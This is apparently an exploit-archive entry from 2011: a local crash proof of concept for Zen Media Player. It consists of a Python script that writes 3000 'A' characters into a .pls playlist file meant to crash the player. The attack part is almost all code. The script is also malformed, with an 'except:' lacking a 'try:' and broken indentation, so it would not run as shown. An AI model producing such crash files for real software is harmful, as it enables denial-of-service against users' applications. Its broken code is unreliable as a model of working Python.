id: 16733
date: 08/20/2011
title: Zen Media Player (.pls) Local Crash Poc
author: Angel Injection
cves: 

><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
# Exploit Title:Zen Media Player (.pls) Local Crash Poc
# Date: 20/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc , http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail.com
# Category:: [ dos / poc ]
# Tested on: Windows Xp Sp3
><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

#!/usr/bin/python

   junk = "\x41" * 3000
   
   f = open("Angel.pls" ,"w")
   f.write(junk)
   f.close()
except:
    print "error"

><><><><><><><><><><><><><><><><><><><><><><><><><><><><>



#  0day.today [2023-03-23]  #